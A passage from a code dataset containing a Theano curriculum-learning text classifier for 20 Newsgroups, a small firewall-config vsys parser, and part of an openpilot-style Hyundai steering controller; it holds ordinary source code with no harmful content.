dtype=theano.config.floatX\n ),\n name='W',\n borrow=True\n )\n # initialize the biases b as a vector of n_out 0s\n self.b = theano.shared(\n value=np.zeros(\n (n_out,),\n dtype=theano.config.floatX\n ),\n name='b',\n borrow=True\n )\n\n # symbolic expression for computing the matrix of class-membership\n # probabilities\n # Where:\n # W is a matrix where column-k represent the separation hyperplane for\n # class-k\n # x is a matrix where row-j represents input training sample-j\n # b is a vector where element-k represent the free parameter of\n # hyperplane-k\n if inputIsSparse:\n self.p_y_given_x = T.nnet.softmax(sparse.structured_dot(input, self.W) + self.b)\n else:\n self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)\n\n # symbolic description of how to compute prediction as class whose\n # probability is maximal\n self.y_pred = T.argmax(self.p_y_given_x, axis=1)\n # end-snippet-1\n\n # parameters of the model\n self.params = [self.W, self.b]\n\n # keep track of model input\n self.input = input\n\n def cost_vec(self, y):\n return -T.log(self.p_y_given_x)[T.arange(y.shape[0]), y]\n\n def cost(self, y):\n \"\"\"Return the mean of the negative log-likelihood of the prediction\n of this model under a given target distribution.\n\n .. math::\n\n \\frac{1}{|\\mathcal{D}|} \\mathcal{L} (\\theta=\\{W,b\\}, \\mathcal{D}) =\n \\frac{1}{|\\mathcal{D}|} \\sum_{i=0}^{|\\mathcal{D}|}\n \\log(P(Y=y^{(i)}|x^{(i)}, W,b)) \\\\\n \\ell (\\theta=\\{W,b\\}, \\mathcal{D})\n\n :type y: theano.tensor.TensorType\n :param y: corresponds to a vector that gives for each example the\n correct label\n\n Note: we use the mean instead of the sum so that\n the learning rate is less dependent on the batch size\n \"\"\"\n # start-snippet-2\n # y.shape[0] is (symbolically) the number of rows in y, i.e.,\n # number of examples (call it n) in the minibatch\n # T.arange(y.shape[0]) is a symbolic vector which will contain\n # [0,1,2,... n-1] T.log(self.p_y_given_x) is a matrix of\n # Log-Probabilities (call it LP) with one row per example and\n # one column per class LP[T.arange(y.shape[0]),y] is a vector\n # v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,\n # LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is\n # the mean (across minibatch examples) of the elements in v,\n # i.e., the mean log-likelihood across the minibatch.\n return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\n # end-snippet-2\n\n def errors(self, y):\n \"\"\"Return a float representing the number of errors in the minibatch\n over the total number of examples of the minibatch ; zero one\n loss over the size of the minibatch\n\n :type y: theano.tensor.TensorType\n :param y: corresponds to a vector that gives for each example the\n correct label\n \"\"\"\n\n # check if y has same dimension of y_pred\n if y.ndim != self.y_pred.ndim:\n raise TypeError(\n 'y should have the same shape as self.y_pred',\n ('y', y.type, 'y_pred', self.y_pred.type)\n )\n # check if y is of the correct datatype\n if y.dtype.startswith('int'):\n # the T.neq operator returns a vector of 0s and 1s, where 1\n # represents a mistake in prediction\n return T.mean(T.neq(self.y_pred, y)).astype(theano.config.floatX)\n else:\n raise NotImplementedError()\n\nclass OVASVMLayer(object):\n \"\"\"SVM-like layer\n \"\"\"\n def __init__(self, input, n_in, n_out, inputIsSparse = True):\n \"\"\" Initialize the parameters of the logistic regression\n\n :type input: theano.tensor.TensorType\n :param input: symbolic variable that describes the input of the\n architecture (one minibatch)\n\n :type n_in: int\n :param n_in: number of input units, the dimension of the space in\n which the datapoints lie\n\n :type n_out: int\n :param n_out: number of output units, the dimension of the space in\n which the labels lie\n\n \"\"\"\n\n # initialize with 0 the weights W as a matrix of shape (n_in, n_out)\n self.W = theano.shared(value=np.zeros((n_in, n_out),\n dtype=theano.config.floatX),\n name='W', borrow=True)\n # initialize the baises b as a vector of n_out 0s\n self.b = theano.shared(value=np.zeros((n_out,),\n dtype=theano.config.floatX),\n name='b', borrow=True)\n\n # parameters of the model\n self.params = [self.W, self.b]\n\n if inputIsSparse:\n self.output = sparse.structured_dot(input, self.W) + self.b\n else:\n self.output = T.dot(input, self.W) + self.b\n\n self.y_pred = T.argmax(self.output, axis=1)\n\n def hinge(self, u):\n return T.maximum(0, 1 - u)\n\n def cost_vec(self, y1):\n \"\"\" return the one-vs-all svm cost\n given ground-truth y in one-hot {-1, 1} form \"\"\"\n y1_printed = theano.printing.Print('this is important')(T.max(y1))\n margin = y1 * self.output\n cost = self.hinge(margin).sum(axis=1)\n return cost\n\n def cost(self, y1):\n cost = self.cost_vec(y1).mean(axis=0)\n return cost\n\n def errors(self, y):\n \"\"\" compute zero-one loss\n note, y is in integer form, not one-hot\n \"\"\"\n\n # check if y has same dimension of y_pred\n if y.ndim != self.y_pred.ndim:\n raise TypeError('y should have the same shape as self.y_pred',\n ('y', target.type, 'y_pred', self.y_pred.type))\n # check if y is of the correct datatype\n if y.dtype.startswith('int'):\n # the T.neq operator returns a vector of 0s and 1s, where 1\n # represents a mistake in prediction\n return T.mean(T.neq(self.y_pred, y))\n else:\n raise NotImplementedError()\n\ndef build_cnn(input_var, input_dim=100,\n fc_num_units=[], num_classes=20, rng=np.random.RandomState(23455), useSVM=True, \n **junk):\n # input layer\n #network = lasagne.layers.InputLayer(shape=(None,) + (input_shape,),\n # input_var=input_var)\n # fc-relu\n\n # construct a fully-connected sigmoidal layer\n for i in range(len(fc_num_units)):\n if i==0:\n network = HiddenLayer(\n rng,\n input=input_var,\n n_in=input_dim,\n n_out=fc_num_units[0],\n activation = T.tanh,\n )\n params=network.params\n else:\n network = HiddenLayer(\n rng,\n input=network.output,\n n_in=fc_num_units[i-1],\n n_out=fc_num_units[i],\n activation = T.tanh,\n inputIsSparse = False,\n )\n params = params + network.params \n\n # output layer\n if len(fc_num_units) == 0:\n if useSVM:\n network = OVASVMLayer(input=input_var, n_in=input_dim, n_out=num_classes)\n else:\n network = LogisticRegression(input=input_var, n_in=input_dim, n_out=num_classes)\n params = network.params\n else:\n if useSVM:\n network = OVASVMLayer(input=network.output, n_in=fc_num_units[-1], n_out=num_classes, inputIsSparse=False)\n else:\n network = LogisticRegression(input=input_var, n_in=fc_num_units[-1], n_out=num_classes, inputIsSparse=False)\n params = params + network.params\n\n return network, params\n\ndef label_vec2mat(data_y):\n\n n_classes = len(np.unique(data_y)) # dangerous?\n y1 = -1 * np.ones((data_y.shape[0], n_classes))\n y1[np.arange(data_y.shape[0]), data_y] = 1\n\n return y1\n\ndef load20newsgroup(categories=None, filtered=False, use_hashing=False, tsne_dim=512, num_cluster=200, dataset_name='20newsgroup'):\n\n if filtered:\n remove = ('headers', 'footers', 'quotes')\n else:\n remove = ()\n\n print(\"Loading 20 newsgroups dataset for categories:\")\n print(categories if categories else \"all\")\n\n data_train = fetch_20newsgroups(subset='train', categories=categories,\n shuffle=True, random_state=42,\n remove=remove)\n\n data_test = fetch_20newsgroups(subset='test', categories=categories,\n shuffle=True, random_state=42,\n remove=remove)\n print('data loaded')\n\n # order of labels in `target_names` can be different from `categories`\n target_names = data_train.target_names\n\n\n def size_mb(docs):\n return sum(len(s.encode('utf-8')) for s in docs) / 1e6\n\n data_train_size_mb = size_mb(data_train.data)\n data_test_size_mb = size_mb(data_test.data)\n\n print(\"%d documents - %0.3fMB (training set)\" % (\n len(data_train.data), data_train_size_mb))\n print(\"%d documents - %0.3fMB (test set)\" % (\n len(data_test.data), data_test_size_mb))\n\n # split a training set and a test set\n Y_train, Y_test = data_train.target, data_test.target\n\n print(\"Extracting features from the training data using a sparse vectorizer\")\n t0 = time.time()\n if use_hashing:\n vectorizer = HashingVectorizer(stop_words='english', non_negative=True,\n n_features=opts.n_features)\n X_train = vectorizer.transform(data_train.data)\n else:\n vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5,\n stop_words='english')\n X_train = vectorizer.fit_transform(data_train.data)\n duration = time.time() - t0\n print(\"done in %fs at %0.3fMB/s\" % (duration, data_train_size_mb / duration))\n print(\"n_samples: %d, n_features: %d\" % X_train.shape)\n print()\n\n print(\"Extracting features from the test data using the same vectorizer\")\n t0 = time.time()\n X_test = vectorizer.transform(data_test.data)\n duration = time.time() - t0\n print(\"done in %fs at %0.3fMB/s\" % (duration, data_test_size_mb / duration))\n print(\"n_samples: %d, n_features: %d\" % X_test.shape)\n\n #dataGroup(X_train, y_train, tsne_dim, num_cluster, dataset_name, savefile=True)\n #dataGroup0(X_train, tsne_dim, num_cluster, dataset_name, savefile=True)\n labels_ = np.loadtxt(dataset_name + '_kmeans_labels.txt').astype(int)\n cluster_centers_ = np.loadtxt(dataset_name + '_kmeans_centers.txt')\n center_nn = np.loadtxt(dataset_name + '_center_nn.txt').astype(int)\n\n def shared_dataset(data_xy, borrow=True):\n \"\"\" Function that loads the dataset into shared variables\n\n The reason we store our dataset in shared variables is to allow\n Theano to copy it into the GPU memory (when code is run on GPU).\n Since copying data into the GPU is slow, copying a minibatch everytime\n is needed (the default behaviour if the data is not in a shared\n variable) would lead to a large decrease in performance.\n \"\"\"\n data_x, data_y = data_xy\n shared_x = sparse.shared(data_x.astype(theano.config.floatX),\n borrow=borrow)\n shared_y = theano.shared(np.asarray(data_y,dtype=theano.config.floatX),\n borrow=borrow)\n\n # one-hot encoded labels as {-1, 1}\n n_classes = len(np.unique(data_y)) # dangerous?\n y1 = -1 * np.ones((data_y.shape[0], n_classes))\n y1[np.arange(data_y.shape[0]), data_y] = 1\n shared_y1 = theano.shared(np.asarray(y1,\n dtype=theano.config.floatX),\n borrow=borrow)\n \n # When storing data on the GPU it has to be stored as floats\n # therefore we will store the labels as ``floatX`` as well\n # (``shared_y`` does exactly that). But during our computations\n # we need them as ints (we use labels as index, and if they are\n # floats it doesn't make sense) therefore instead of returning\n # ``shared_y`` we will have to cast it to int. This little hack\n # lets ous get around this issue\n return shared_x, T.cast(shared_y, 'int32'), T.cast(shared_y1, 'int32')\n\n #X_train, Y_train, Y1_train = shared_dataset((X_train, y_train))\n #X_test, Y_test, Y1_test = shared_dataset((X_test, y_test))\n\n return dict(\n X_train=X_train.astype(theano.config.floatX),\n Y_train=Y_train.astype('int32'),\n Y1_train=label_vec2mat(Y_train).astype('int32'),\n X_test=X_test.astype(theano.config.floatX),\n Y_test=Y_test.astype('int32'),\n Y1_test=label_vec2mat(Y_test).astype('int32'),\n kmeans_label = labels_.astype('int32'),\n kmeans_center = cluster_centers_.astype(theano.config.floatX),\n kmeans_center_nn = center_nn.astype('int32'),)\n\n# ############################## Main program ################################\n\ndef main(num_epochs=40, model=None, \n learning_rate=3.5, loss_weight = 6.5e+18, curriculum_rate=0.06, \n epoch_iters = 30, batch_size = 64, stain_factor = 30.0, \n k = 4, func = 'concavefeature', func_parameter = 0.5, useSVM = False):\n#def main(num_epochs=200, model=None, \n # learning_rate=8e-3, loss_weight = 3.5e+5, curriculum_rate=0.06, \n # epoch_iters = 50, batch_size = 64, stain_factor = 2.0, \n # k = 4, func = 'concavefeature', func_parameter = 0.5, useSVM = True):\n\n # Load the dataset\n # print(\"Loading data...\")\n data = load20newsgroup()\n X_train = data['X_train']\n #print(type(X_train.get_value(borrow=True)[range(2,5)]))\n Y_train = data['Y_train']\n Y1_train = data['Y1_train']\n X_test = data['X_test']\n Y_test = data['Y_test']\n Y1_test = data['Y1_test']\n labels_ = data['kmeans_label']\n labels_weight = np.array([len(np.where(labels_==i)[0]) for i in np.unique(labels_)])\n labels_weight = np.divide(labels_weight,float(np.max(labels_weight)))\n\n cluster_centers_ = data['kmeans_center']\n center_nn = data['kmeans_center_nn']\n num_cluster = cluster_centers_.shape[0]\n\n # compute number of minibatches for training, validation and testing\n n_train = X_train.shape[0]\n n_train_batches = n_train // batch_size\n n_test = X_test.shape[0]\n n_test_batches = n_test // batch_size\n center_pass = np.ones(len(center_nn))\n\n index = T.lscalar()\n cindex = T.lvector()\n x = sparse.csr_matrix('x')\n y = T.ivector('y')\n if useSVM:\n y1 = T.imatrix('y1')\n else:\n Y1_train = Y_train\n Y1_test = Y_test\n y1 = T.ivector('y1')\n\n # Create neural network model\n print(\"Building model and compiling functions...\")\n rng = np.random.RandomState(23455)\n network, params = build_cnn(x, input_dim=X_train.shape[1], num_classes=len(np.unique(Y_train)), useSVM=useSVM)\n cost = network.cost(y1)\n cost_vec = network.cost_vec(y1)\n \n if model is None:\n\n # create a list of gradients for all model parameters\n grads = T.grad(cost, params)\n\n updates = []\n for param_i, grad_i in zip(params, grads):\n updates.append((param_i, param_i - learning_rate * grad_i))\n\n # train_model = theano.function([cindex], cost, updates=updates,\n # givens={\n # x: X_train[cindex,:],\n # y1: Y1_train[cindex]})\n\n train_model = theano.function([x, y1], cost, updates=updates)\n\n # loss_model = theano.function([cindex], network.cost_vec(y1),\n # givens={\n # x: X_train[cindex,:],\n # y1: Y1_train[cindex]})\n\n loss_model = theano.function([x, y1], cost_vec)\n\n # create a function to compute the mistakes that are made by the model\n # test_model = theano.function([cindex], network.errors(y),\n # givens={\n # x: X_test[cindex,:],\n # y: Y_test[cindex]})\n\n test_model = theano.function([x, y, y1], [network.errors(y), cost])\n\n # error_model = theano.function([cindex], network.errors(y),\n # givens={\n # x: X_train[cindex,:],\n # y: Y_train[cindex]})\n\n print(\"model complied, initialize curriculum...\")\n\n #initialize\n minGain, sinGain, optSubmodular = initSubmodularFunc(cluster_centers_, k)\n old_all_loss = float('inf')\n passed_index = np.array([]) \n passes = 0\n output_seq = ()\n if model is None:\n # launch the training loop\n print(\"Starting training...\")\n submodular_time = 0\n start_epochs_time = time.time()\n for epoch in range(num_epochs):\n\n if len(passed_index) <= n_train:\n\n stain_weight = np.power(center_pass, -1/stain_factor)\n start_time = time.time()\n for iters in range(epoch_iters):\n\n # compute loss\n submodular_start_time = time.time()\n loss_vec_center = loss_model(X_train[center_nn], Y1_train[center_nn])\n all_loss = sum(loss_vec_center)\n loss_vec_center *= labels_weight * stain_weight * (loss_weight / num_cluster)\n topkLoss = sum(np.partition(loss_vec_center, -k)[-k:])\n #print(optSubmodular, topkLoss)\n optObj = optSubmodular + topkLoss\n\n if epoch % 6 == 0 and epoch > 200:\n train_index = np.random.choice(n_train, 32, replace=False)\n else:\n # update A (topkIndex)\n left_index = pruneGroundSet(minGain, sinGain, loss_vec_center, k)\n topkIndex = modularLowerBound(cluster_centers_[left_index,:], k, func, func_parameter, loss_vec_center[left_index], optObj)\n topkIndex = left_index[topkIndex]\n center_pass[topkIndex] += 2.0\n\n # update classifier (train_model) \n train_index = np.array([])\n for i in range(len(topkIndex)):\n train_index = np.append(train_index, np.where(labels_ == topkIndex[i])[0])\n train_index = np.random.permutation(train_index.astype(int))\n #print('number of training samples =', len(train_index))\n passes += len(train_index)\n passed_index = np.unique(np.append(passed_index, train_index))\n submodular_time += (time.time() - submodular_start_time)\n\n # training by mini-batch sgd\n start_index = 0\n train_loss = np.array([])\n while start_index < len(train_index):\n end_index = min([start_index + batch_size, len(train_index)])\n batch_index = train_index[start_index : end_index]\n start_index = end_index\n train_loss = np.append(train_loss, train_model(X_train[batch_index], Y1_train[batch_index]))\n this_train_loss = np.mean(train_loss)\n\n else:\n \n train_index = np.arange(X_train.shape[0])\n np.random.shuffle(train_index)\n train_index = train_index[:3000]\n passes += len(train_index)\n passed_index = np.unique(np.append(passed_index, train_index))\n \n # training by mini-batch sgd\n start_time = time.time()\n start_index = 0\n train_loss = np.array([])\n while start_index < len(train_index):\n end_index = min([start_index + batch_size, len(train_index)])\n batch_index = train_index[start_index : end_index]\n start_index = end_index\n train_loss = np.append(train_loss, train_model(X_train[batch_index], Y1_train[batch_index]))\n this_train_loss = np.mean(train_loss)\n all_loss = np.sum(train_loss)\n\n # And a full pass over the validation data:\n start_index = 0\n train_err = np.array([])\n train_loss = np.array([])\n while start_index < n_train:\n end_index = min([start_index + batch_size, n_train])\n batch_index = range(start_index, end_index)\n batch_err, batch_loss = test_model(X_train[batch_index], Y_train[batch_index], Y1_train[batch_index])\n train_err = np.append(train_err, batch_err)\n train_loss = np.append(train_loss, batch_loss)\n start_index = end_index\n this_train_err = np.mean(train_err)\n this_train_loss = np.mean(train_loss)\n\n start_index = 0\n test_err = np.array([])\n test_loss = np.array([])\n while start_index < n_test:\n end_index = min([start_index + batch_size, n_test])\n batch_index = range(start_index, end_index)\n batch_err, batch_loss = test_model(X_test[batch_index], Y_test[batch_index], Y1_test[batch_index])\n test_err = np.append(test_err, batch_err)\n test_loss = np.append(test_loss, batch_loss)\n start_index = end_index\n this_test_err = np.mean(test_err)\n this_test_loss = np.mean(test_loss)\n\n # Then we print the results for this epoch:\n print(\"Epoch {} of {} took {:.3f}s, up to now {} trainings {} passes\".format(\n epoch + 1, num_epochs, time.time() - start_time, len(passed_index), passes))\n print(\" training err:\\t\\t{:.6f}\".format(this_train_err*100.))\n print(\" test err:\\t\\t{:.6f}\".format(this_test_err*100.))\n print(\" training loss:\\t\\t{:.2f}\".format(this_train_loss))\n print(\" test loss:\\t\\t{:.2f}\".format(this_test_loss))\n\n output_seq = output_seq + (np.array([len(passed_index),passes,this_train_loss,this_test_loss,this_train_err*100.,this_test_err*100.]),)\n # increase curriculum rate\n loss_weight *= curriculum_rate + 1\n k = min([k + 20, num_cluster])\n if all_loss > 1.001 * old_all_loss:\n print('no improvement: reduce learning rate!')\n learning_rate *= 0.96\n old_all_loss = all_loss\n\n # dump the network weights to a file :\n print('Total time =', time.time() - start_epochs_time)\n print('Submodular time =', submodular_time)\n with open('20newsgroups_shallow_model.pkl', 'wb') as f:\n pickle.dump(network, f)\n output_seq = np.vstack(output_seq)\n np.savetxt('20newsgroups_logistic_cLearn_k+20_result.txt', output_seq)\n else:\n # load network weights from model file\n network = pickle.load(open('20newsgroups_shallow_model.pkl'))\n\n return output_seq\n\n\nif __name__ == '__main__':\n if ('--help' in sys.argv) or ('-h' in sys.argv):\n print(\"Trains a Deep Residual Learning network on 20newsgroup using Theano.\")\n print(\"Network architecture and training parameters are as in section 4.2 in 'Deep Residual Learning for Image Recognition'.\")\n print(\"Usage: %s [N [MODEL]]\" % sys.argv[0])\n print()\n print(\"N: Number of stacked residual building blocks per feature map (default: 5)\")\n print(\"MODEL: saved model file to load (for validation) (default: None)\")\n else:\n kwargs = {}\n if len(sys.argv) > 1:\n kwargs['n'] = int(sys.argv[1])\n if len(sys.argv) > 2:\n kwargs['model'] = sys.argv[2]\n output_seq = main(**kwargs)\n\n plt.figure(figsize = (20, 10))\n plt.subplot(1,2,1)\n plt.plot(output_seq[:, 1], output_seq[:, 2], 'yo-', label = 'training loss')\n plt.plot(output_seq[:, 1], output_seq[:, 3], 'co-', label = 'training err')\n plt.plot(output_seq[:, 1], output_seq[:, 4], 'mo-', label = 'test err')\n plt.grid()\n plt.legend(fontsize='large', loc = 1)\n plt.ylabel('Error rate (%)') \n plt.xlabel('Number of passed training samples (including copies)')\n\n plt.subplot(1,2,2)\n plt.plot(output_seq[:, 0], output_seq[:, 2], 'yo-', label = 'training loss')\n plt.plot(output_seq[:, 0], output_seq[:, 3], 'co-', label = 'training err')\n plt.plot(output_seq[:, 0], output_seq[:, 4], 'mo-', label = 'test err')\n plt.grid()\n plt.legend(fontsize='large', loc = 1)\n plt.ylabel('Error rate (%)') \n plt.xlabel('Size of set of passed training samples')\n \n plt.savefig('20newsgroup_logistic_cLearn_k+20.eps', format = 'eps', bbox_inches='tight')\n plt.show()","sub_path":"svm_curriculum.py","file_name":"svm_curriculum.py","file_ext":"py","file_size_in_byte":31250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"81980785","text":"import re\nimport sys\nburb_set = set()\nfile = open(sys.argv[1], 'r').read().splitlines()\nprint('\\n \\n \\n \\n \\n ')\nfor line in file:\n if re.search('(?<=set vsys \").*?(?=\")', line):\n match = re.search('(?<=set vsys \").*?(?=\")', line)\n vsys = match.group(0)\n vsys = (' \\n ')\n print(vsys)\nprint(' \\n \\n \\n')\n","sub_path":"scripts/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"101407493","text":"from cereal import car, log\nfrom common.realtime import DT_CTRL\nfrom selfdrive.car import apply_std_steer_torque_limits\nfrom selfdrive.car.hyundai.hyundaican import create_lkas11, create_clu11, create_lfa_mfa, create_mdps12\nfrom selfdrive.car.hyundai.values import Buttons, SteerLimitParams, CAR, FEATURES\nfrom opendbc.can.packer import CANPacker\nfrom selfdrive.config import Conversions as CV\nfrom common.numpy_fast import interp\n\n# speed controller\nfrom selfdrive.car.hyundai.spdcontroller import SpdController\nfrom selfdrive.car.hyundai.spdctrlSlow import SpdctrlSlow\nfrom selfdrive.car.hyundai.spdctrlNormal import SpdctrlNormal\nfrom selfdrive.car.hyundai.spdctrlFast import SpdctrlFast\n\nfrom common.params import Params\nfrom selfdrive.kyd_conf import kyd_conf\nimport common.log as trace1\nimport common.CTime1000 as tm\n\nVisualAlert = car.CarControl.HUDControl.VisualAlert\nLaneChangeState = log.PathPlan.LaneChangeState\n\nclass CarController():\n def __init__(self, dbc_name, CP, VM):\n self.CP = CP\n self.apply_steer_last = 0\n self.car_fingerprint = CP.carFingerprint\n self.packer = CANPacker(dbc_name)\n self.steer_rate_limited = False\n self.resume_cnt = 0\n self.last_resume_frame = 0\n self.last_lead_distance = 0\n self.lanechange_manual_timer = 0\n self.emergency_manual_timer = 0\n self.driver_steering_torque_above_timer = 0\n self.mode_change_timer = 0\n\n self.steer_mode = \"\"\n self.mdps_status = \"\"\n self.lkas_switch = \"\"\n\n self.lkas11_cnt = 0\n\n self.nBlinker = 0\n\n self.dRel = 0\n self.yRel = 0\n self.vRel = 0\n\n self.timer1 = tm.CTime1000(\"time\")\n self.model_speed = 0\n self.model_sum = 0\n \n # hud\n self.hud_timer_left = 0\n self.hud_timer_right = 0\n\n self.command_cnt = 0\n self.command_load = 0\n self.params = Params()\n\n # param\n self.param_preOpkrAccelProfile = -1\n self.param_OpkrAccelProfile = 0\n self.param_OpkrAutoResume = 0\n self.param_OpkrEnableLearner = 0\n\n self.SC = None\n self.traceCC = trace1.Loger(\"CarController\")\n\n self.res_cnt = 7\n self.res_delay = 0\n\n kyd = kyd_conf()\n self.driver_steering_torque_above = float(kyd.conf['driverSteeringTorqueAbove'])\n\n self.params = Params()\n self.mode_change_switch = int(self.params.get('CruiseStatemodeSelInit'))\n\n def process_hud_alert(self, enabled, CC ):\n visual_alert = CC.hudControl.visualAlert\n left_lane = CC.hudControl.leftLaneVisible\n right_lane = CC.hudControl.rightLaneVisible\n\n sys_warning = (visual_alert == VisualAlert.steerRequired)\n\n if left_lane:\n self.hud_timer_left = 100\n\n if right_lane:\n self.hud_timer_right = 100\n\n if self.hud_timer_left:\n self.hud_timer_left -= 1\n \n if self.hud_timer_right:\n self.hud_timer_right -= 1\n\n\n # initialize to no line visible\n sys_state = 1\n if self.hud_timer_left and self.hud_timer_right or sys_warning: # HUD alert only display when LKAS status is active\n if enabled or sys_warning:\n sys_state = 3\n else:\n sys_state = 4\n elif self.hud_timer_left:\n sys_state = 5\n elif self.hud_timer_right:\n sys_state = 6\n\n return sys_warning, sys_state\n\n\n def param_load(self ):\n self.command_cnt += 1\n if self.command_cnt > 100:\n self.command_cnt = 0\n\n if self.command_cnt % 10:\n return\n\n self.command_load += 1\n if self.command_load == 1:\n self.param_OpkrAccelProfile = int(self.params.get('OpkrAccelProfile')) \n elif self.command_load == 2:\n self.param_OpkrAutoResume = int(self.params.get('OpkrAutoResume'))\n else:\n self.command_load = 0\n \n self.param_OpkrEnableLearner = int(self.params.get('OpkrEnableLearner'))\n\n # speed controller\n if self.param_preOpkrAccelProfile != self.param_OpkrAccelProfile:\n self.param_preOpkrAccelProfile = self.param_OpkrAccelProfile\n if self.param_OpkrAccelProfile == 1:\n self.SC = SpdctrlSlow()\n elif self.param_OpkrAccelProfile == 2:\n self.SC = SpdctrlNormal()\n else:\n self.SC = SpdctrlFast()\n\n\n #아톰님 보간함수 참조\n def cV_tune( self, v_ego, cv_value ): # cV(곡률에 의한 변화)\n kyd = kyd_conf()\n self.sRKPHV = [9., 22.]\n self.cVBPV = kyd.conf['cvBPV'] # 곡률\n self.cvSteerMaxV1 = kyd.conf['cvSteerMaxV1']\n self.cvSteerDeltaUpV1 = kyd.conf['cvSteerDeltaUpV1']\n self.cvSteerDeltaDnV1 = kyd.conf['cvSteerDeltaDnV1']\n self.cvSteerMaxV2 = kyd.conf['cvSteerMaxV2']\n self.cvSteerDeltaUpV2 = kyd.conf['cvSteerDeltaUpV2']\n self.cvSteerDeltaDnV2 = kyd.conf['cvSteerDeltaDnV2']\n\n cv_BPV = self.cVBPV # 곡률\n # Max\n self.steerMax1 = interp( cv_value, cv_BPV, self.cvSteerMaxV1 )\n self.steerMax2 = interp( cv_value, cv_BPV, self.cvSteerMaxV2 )\n self.steerMaxV = [ float(self.steerMax1), float(self.steerMax2) ]\n self.MAX = interp( v_ego, self.sRKPHV, self.steerMaxV ) \n\n # Up\n self.steerUP1 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV1 )\n self.steerUP2 = interp( cv_value, cv_BPV, self.cvSteerDeltaUpV2 )\n self.steerUPV = [ float(self.steerUP1), float(self.steerUP2) ]\n self.UP = interp( v_ego, self.sRKPHV, self.steerUPV )\n\n # Dn\n self.steerDN1 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV1 )\n self.steerDN2 = interp( cv_value, cv_BPV, self.cvSteerDeltaDnV2 ) \n self.steerDNV = [ float(self.steerDN1), float(self.steerDN2) ]\n self.DN = interp( v_ego, self.sRKPHV, self.steerDNV )\n\n\n def update(self, CC, CS, frame, sm, CP ):\n\n if self.CP != CP:\n self.CP = CP\n\n self.param_load()\n \n enabled = CC.enabled\n actuators = CC.actuators\n pcm_cancel_cmd = CC.cruiseControl.cancel\n \n self.dRel, self.yRel, self.vRel = SpdController.get_lead( sm )\n\n if self.SC is not None:\n self.model_speed, self.model_sum = self.SC.calc_va( sm, CS.out.vEgo )\n else:\n self.model_speed = self.model_sum = 0\n\n # Steering Torque\n if self.param_OpkrEnableLearner:\n new_steer = actuators.steer * SteerLimitParams.STEER_MAX\n apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, SteerLimitParams)\n self.steer_rate_limited = new_steer != apply_steer\n else:\n path_plan = sm['pathPlan']\n self.cV_tune( CS.out.vEgo, self.model_speed )\n param = SteerLimitParams()\n param.STEER_MAX = min( param.STEER_MAX, self.MAX )\n param.STEER_DELTA_UP = min( param.STEER_DELTA_UP, self.UP )\n param.STEER_DELTA_DOWN = min( param.STEER_DELTA_DOWN, self.DN )\n new_steer = actuators.steer * param.STEER_MAX\n apply_steer = apply_std_steer_torque_limits(new_steer, self.apply_steer_last, CS.out.steeringTorque, param) \n self.steer_rate_limited = new_steer != apply_steer\n\n\n # disable if steer angle reach 90 deg, otherwise mdps fault in some models\n lkas_active = enabled and abs(CS.out.steeringAngle) < 90.\n\n if (( CS.out.leftBlinker and not CS.out.rightBlinker) or ( CS.out.rightBlinker and not CS.out.leftBlinker)) and CS.out.vEgo < 60 * CV.KPH_TO_MS:\n self.lanechange_manual_timer = 10\n if CS.out.leftBlinker and CS.out.rightBlinker:\n self.emergency_manual_timer = 10\n if abs(CS.out.steeringTorque) > self.driver_steering_torque_above and CS.out.vEgo < 60:\n self.driver_steering_torque_above_timer = 30\n if self.lanechange_manual_timer or self.driver_steering_torque_above_timer:\n lkas_active = 0\n if self.lanechange_manual_timer > 0:\n self.lanechange_manual_timer -= 1\n if self.emergency_manual_timer > 0:\n self.emergency_manual_timer -= 1\n if self.driver_steering_torque_above_timer > 0:\n self.driver_steering_torque_above_timer -= 1\n\n if not lkas_active:\n apply_steer = 0\n\n steer_req = 1 if apply_steer else 0 \n\n self.apply_steer_last = apply_steer\n\n sys_warning, sys_state = self.process_hud_alert( lkas_active, CC )\n\n clu11_speed = CS.clu11[\"CF_Clu_Vanz\"]\n enabled_speed = 38 if CS.is_set_speed_in_mph else 55\n if clu11_speed > enabled_speed:\n enabled_speed = clu11_speed\n\n can_sends = []\n if frame == 0: # initialize counts from last received count signals\n self.lkas11_cnt = CS.lkas11[\"CF_Lkas_MsgCount\"] + 1\n self.lkas11_cnt %= 0x10\n\n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 0 ))\n if CS.mdps_bus or CS.scc_bus == 1: # send lkas11 bus 1 if mdps is on bus 1 \n can_sends.append(create_lkas11(self.packer, self.lkas11_cnt, self.car_fingerprint, apply_steer, steer_req,\n CS.lkas11, sys_warning, sys_state, CC, enabled, 1 ))\n\n if CS.mdps_bus: # send clu11 to mdps if it is not on bus 0 \n #if frame % 2 and CS.mdps_bus == 1: # send clu11 to mdps if it is not on bus 0 \n can_sends.append(create_clu11(self.packer, frame, CS.mdps_bus, CS.clu11, Buttons.NONE, enabled_speed))\n \n #if CS.mdps_bus:\n can_sends.append(create_mdps12(self.packer, frame, CS.mdps12)) \n\n str_log1 = '곡률={:05.1f}/{:=+06.3f} 토크={:=+04.0f}/{:=+04.0f}'.format( self.model_speed, self.model_sum, new_steer, CS.out.steeringTorque )\n if self.param_OpkrEnableLearner:\n str_log2 = '프레임율={:03.0f} STMAX={:03.0f}'.format( self.timer1.sampleTime(), SteerLimitParams.STEER_MAX, )\n else:\n str_log2 = '프레임율={:03.0f} ST={:03.0f}/{:01.0f}/{:01.0f} SR={:05.2f}'.format( self.timer1.sampleTime(), self.MAX, self.UP, self.DN, path_plan.steerRatio )\n trace1.printf( '{} {}'.format( str_log1, str_log2 ) )\n\n if CS.out.cruiseState.modeSel == 0 and self.mode_change_switch == 4:\n self.mode_change_timer = 50\n self.mode_change_switch = 0\n elif CS.out.cruiseState.modeSel == 1 